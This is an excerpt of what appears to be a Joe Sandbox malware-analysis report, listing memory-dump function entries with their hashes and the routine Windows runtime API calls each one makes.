                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 3679549980-2505862506
                                                                                                      • Opcode ID: b74adf27d26232a25aa716088a776b573c310c8db807ed823c8d6f5f800f4929
                                                                                                      • Instruction ID: a478b7b6b1e65b6154a93932b707766541e1961f43008e8f993df872ea01a801
                                                                                                      • Opcode Fuzzy Hash: b74adf27d26232a25aa716088a776b573c310c8db807ed823c8d6f5f800f4929
                                                                                                      • Instruction Fuzzy Hash: 8A91FCB1C28209AADF14EBB4D98ABFE77B8BF01304F10211AF581B6191DB759E0DD761
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 3943753294-2505862506
                                                                                                      • Opcode ID: fc22d131d849f925954406d24fce1c5aa63c21e72d592c47e14181c126aa0727
                                                                                                      • Instruction ID: d6e66c045e3a2a6624c91f4a428f2edc2ddff1b2d9201f29e4f65625e93b0e78
                                                                                                      • Opcode Fuzzy Hash: fc22d131d849f925954406d24fce1c5aa63c21e72d592c47e14181c126aa0727
                                                                                                      • Instruction Fuzzy Hash: 88515C31900619CFCF14EF68C5856AAB7B4FF49314B24559AE84EBB251C770ED41CBB1
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID: Pb$Tb
                                                                                                      • API String ID: 269201875-3647137708
                                                                                                      • Opcode ID: 086bb6ecf1dfa244ebdb4e401d13de94eb7c2fa60598ed0b3722a91aa3490cd0
                                                                                                      • Instruction ID: e68e1a87ed0d9dd0b9e78a7ec0da01deac94c4f3ef3cb92e9e06a7aa2b8627b5
                                                                                                      • Opcode Fuzzy Hash: 086bb6ecf1dfa244ebdb4e401d13de94eb7c2fa60598ed0b3722a91aa3490cd0
                                                                                                      • Instruction Fuzzy Hash: 29619275900219AFDB20DF74C881BAAB7F5AB4E720F24516AF944FF291E770AD418B90
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00EB328D,000000FF), ref: 00E33E4A
                                                                                                      • SetEvent.KERNEL32(?), ref: 00E33E7B
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E33E9C
                                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E33ECB
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E33ED7
                                                                                                      • TerminateThread.KERNEL32(00000000,00000000), ref: 00E33EF5
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E33F23
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E33F96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CloseHandleLeave$EnterEventMultipleObjectsTerminateThreadWait
                                                                                                      • String ID: @a
                                                                                                      • API String ID: 3905900015-1769526761
                                                                                                      • Opcode ID: 24eab1ec318f0d4308c35a1a62bc40b295db3acf76f0ab3c6b3bca8adb2f085d
                                                                                                      • Instruction ID: 9c52c5a271fbb57d5aa29240c1a4c512600648e6ebf21ab5527f74e3ac16789a
                                                                                                      • Opcode Fuzzy Hash: 24eab1ec318f0d4308c35a1a62bc40b295db3acf76f0ab3c6b3bca8adb2f085d
                                                                                                      • Instruction Fuzzy Hash: CF519E30A04745DFEB21CF66C848BABBFF4AF05318F44061DE446A7A90D7B5A948CBA0
                                                                                                      APIs
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E949F1
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94A21
                                                                                                        • Part of subcall function 00E921B4: __aulldvrm.LIBCMT ref: 00E921E5
                                                                                                      • DName::operator+.LIBCMT ref: 00E94A3C
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94A49
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94A79
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94A83
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94AA7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NameName::$Name::operator+__aulldvrm
                                                                                                      • String ID: bj$bj
                                                                                                      • API String ID: 4069495278-1365651532
                                                                                                      • Opcode ID: ce770dc44a1740b25ea9d078911e39bf783107095f045767de017f62d84e3010
                                                                                                      • Instruction ID: b8c7a40b3c7b5e1904b583f02511e41b8830ff7c46faef812df38a20c1e8ae1a
                                                                                                      • Opcode Fuzzy Hash: ce770dc44a1740b25ea9d078911e39bf783107095f045767de017f62d84e3010
                                                                                                      • Instruction Fuzzy Hash: 5831CEB1988208AEDF08CBA4DC91EED7BF5FB19310F04614DE552772D1EBB0598ACB58
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464150960-0
                                                                                                      • Opcode ID: 80e05bbe2859309d4b356a92c9c349a6dbbd1df068aadc3ba75c11b2919fef2e
                                                                                                      • Instruction ID: da9d4fadd760f634677a6dcc4f57bf1f1e227452fdfa870d7d592405bb78f049
                                                                                                      • Opcode Fuzzy Hash: 80e05bbe2859309d4b356a92c9c349a6dbbd1df068aadc3ba75c11b2919fef2e
                                                                                                      • Instruction Fuzzy Hash: DFD15BB1C0020AAFCF14DFA4CA99AFEBBB8AB44308F10A15ED512B7251D7755B49CF91
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 72672806cebfe71a6e91f7a2087f7b433449dbfa6092085e20b274324d6a4ee3
                                                                                                      • Instruction ID: d5f7f5b730dc65ae55adfe3e271c7df8bda5d1cf9b8566b045dad72e82e7ec3b
                                                                                                      • Opcode Fuzzy Hash: 72672806cebfe71a6e91f7a2087f7b433449dbfa6092085e20b274324d6a4ee3
                                                                                                      • Instruction Fuzzy Hash: 7121A7B690010CAFCF41EF94CA81DDD7BB9AF89340B0051A6F515AF161EB75EA548B80
                                                                                                      APIs
                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00E91288
                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00E913B9
                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00E9148B
                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00E9150F
                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 00E9152A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwind
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 1184646756-393685449
                                                                                                      • Opcode ID: a8b0d219286caef0a2ce8bb2a048db77eb9f26d93faece0196814444ac1fc79a
                                                                                                      • Instruction ID: 5da189fe19ca225f6267b34c1f8a60a1f52ada173ae3470b521080166b10e5aa
                                                                                                      • Opcode Fuzzy Hash: a8b0d219286caef0a2ce8bb2a048db77eb9f26d93faece0196814444ac1fc79a
                                                                                                      • Instruction Fuzzy Hash: 80B1AC71D0020AEFCF15EFA4C9819AEB7B5FF08304B1565AAE815BB612D730DA51CF91
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$___from_strstr_to_strchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3409252457-0
                                                                                                      • Opcode ID: f4e97d12255e065568281f27270e4f9deb3ab6d2f3cd16dbd7167b8a68ff5cba
                                                                                                      • Instruction ID: d4a60b937fca72b61867524eb16ac246e11136bb664268af4a463e79dcfae1ef
                                                                                                      • Opcode Fuzzy Hash: f4e97d12255e065568281f27270e4f9deb3ab6d2f3cd16dbd7167b8a68ff5cba
                                                                                                      • Instruction Fuzzy Hash: 9451F8B1D08205AFDB24AF799CC1A6E7BE8EF8B314F105169F614BF183E775A9008B51
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4A0C9
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4A0EB
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4A10B
                                                                                                      • __Getctype.LIBCPMT ref: 00E4A1A1
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00E4A1C0
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4A1D8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                      • String ID: [8
                                                                                                      • API String ID: 1102183713-3360502610
                                                                                                      • Opcode ID: e54d381ed043c8fdc905f508646300cecd78ac3b0c20e6476ccc8c070323ed20
                                                                                                      • Instruction ID: 146ddd199deed6b70c59da7edd7601f28b43ccad7e2ef71b3799d69e8cec6d0c
                                                                                                      • Opcode Fuzzy Hash: e54d381ed043c8fdc905f508646300cecd78ac3b0c20e6476ccc8c070323ed20
                                                                                                      • Instruction Fuzzy Hash: DC41A3B1E012488FCB11DF54DC81AAAB7F4EB14724F2451ADE85ABB391DB30BD05CB91
                                                                                                      APIs
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00E8ECF7
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00E8ECFF
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00E8ED88
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00E8EDB3
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00E8EE08
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: `F$csm
                                                                                                      • API String ID: 1170836740-3340950636
                                                                                                      • Opcode ID: bcdf997098b7478f542f3d5e208962ecf2864bc54b032028a026ad95e0364486
                                                                                                      • Instruction ID: d1baa3df1e4e1d229011f41314474e3163ab8ee65e68f0020941bdb2ef12b342
                                                                                                      • Opcode Fuzzy Hash: bcdf997098b7478f542f3d5e208962ecf2864bc54b032028a026ad95e0364486
                                                                                                      • Instruction Fuzzy Hash: 7E41B334A002199FCF10EF68C885A9EBBF5BF45318F149595E81D7B392D7319D09CB91
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EA43FF: GetLastError.KERNEL32(?,?,00E98DBE,00EE40B0,00000010), ref: 00EA4403
                                                                                                        • Part of subcall function 00EA43FF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E98DBE,00EE40B0,00000010), ref: 00EA44A7
                                                                                                      • _free.LIBCMT ref: 00EA2A55
                                                                                                      • _free.LIBCMT ref: 00EA2A6E
                                                                                                      • _free.LIBCMT ref: 00EA2AA0
                                                                                                      • _free.LIBCMT ref: 00EA2AA9
                                                                                                      • _free.LIBCMT ref: 00EA2AB5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorLast
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 3291180501-2505862506
                                                                                                      • Opcode ID: fcbb7f3f73fedd2969efd31a7b9c5e37a4ce139b96de57e7a2067c76b5bd2a15
                                                                                                      • Instruction ID: 30d380b04988aa27f6364f15cffb02dfa34e2d987cc25a07dab0531860231357
                                                                                                      • Opcode Fuzzy Hash: fcbb7f3f73fedd2969efd31a7b9c5e37a4ce139b96de57e7a2067c76b5bd2a15
                                                                                                      • Instruction Fuzzy Hash: 78B12775A012199FDB24DF18C884AADB7B4FB49704F1045AEE909BB290E770BE90CF40
                                                                                                      APIs
                                                                                                      • GetCPInfo.KERNEL32(00911CD0,00911CD0,?,7FFFFFFF,?,?,00EB24C4,00911CD0,00911CD0,?,00911CD0,?,?,?,?,00911CD0), ref: 00EB22CC
                                                                                                      • MultiByteToWideChar.KERNEL32(00911CD0,00000009,00911CD0,00911CD0,00000000,00000000,?,00EB24C4,00911CD0,00911CD0,?,00911CD0,?,?,?,?), ref: 00EB234F
                                                                                                      • MultiByteToWideChar.KERNEL32(00911CD0,00000001,00911CD0,00911CD0,00000000,00000000,?,00EB24C4,00911CD0,00911CD0,?,00911CD0,?,?,?,?), ref: 00EB23C5
                                                                                                      • MultiByteToWideChar.KERNEL32(00911CD0,00000009,00EB24C4,00911CD0,00000000,00000000,?,00EB24C4,00911CD0,00911CD0,?,00911CD0,?,?,?,?), ref: 00EB23DC
                                                                                                        • Part of subcall function 00EA6049: RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
                                                                                                      • MultiByteToWideChar.KERNEL32(00911CD0,00000001,00EB24C4,00911CD0,00000000,00911CD0,?,00EB24C4,00911CD0,00911CD0,?,00911CD0,?,?,?,?), ref: 00EB2440
                                                                                                      • __freea.LIBCMT ref: 00EB246B
                                                                                                      • __freea.LIBCMT ref: 00EB2477
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2829977744-0
                                                                                                      • Opcode ID: 553fd8f5c0fa0a9ec29e97c044edae0630d3b5a872b26c6194b5f2d268df2f45
                                                                                                      • Instruction ID: 44109f0a8f4b2c7344c20078f09072f059c25dd8fef645b1b77b682786c0e57d
                                                                                                      • Opcode Fuzzy Hash: 553fd8f5c0fa0a9ec29e97c044edae0630d3b5a872b26c6194b5f2d268df2f45
                                                                                                      • Instruction Fuzzy Hash: F381C171E042169FDF219FA58885EEF7BF9AF09714F18515DEB14FB260D7258C408BA0
                                                                                                      APIs
                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000,AB1AAB9C), ref: 00E32676
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000400,?,00000000,00000000,AB1AAB9C), ref: 00E326EA
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,00000000,00000000,?,00000400,?,00000000,00000000,AB1AAB9C), ref: 00E3278E
                                                                                                      • LocalFree.KERNEL32(00000000,-00000001,00000000,?,00000400,?,00000000,00000000,AB1AAB9C), ref: 00E328B2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$FormatFreeLocalMessage
                                                                                                      • String ID: @a$Unknown error (%d)
                                                                                                      • API String ID: 1902725900-3018888374
                                                                                                      • Opcode ID: bb79a27d1b511db604d0124a1d14a3ab31aac5ee92b4c359d20f63805a3c2201
                                                                                                      • Instruction ID: 9737369b87d81a56e2708f35198dfa477787e74cece6095429d47a1cbb26bbd6
                                                                                                      • Opcode Fuzzy Hash: bb79a27d1b511db604d0124a1d14a3ab31aac5ee92b4c359d20f63805a3c2201
                                                                                                      • Instruction Fuzzy Hash: 2F81BA70A04349AAEB28DF64C859BAEBFB5EF05304F20025DE505BB682DBB56544CB90
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
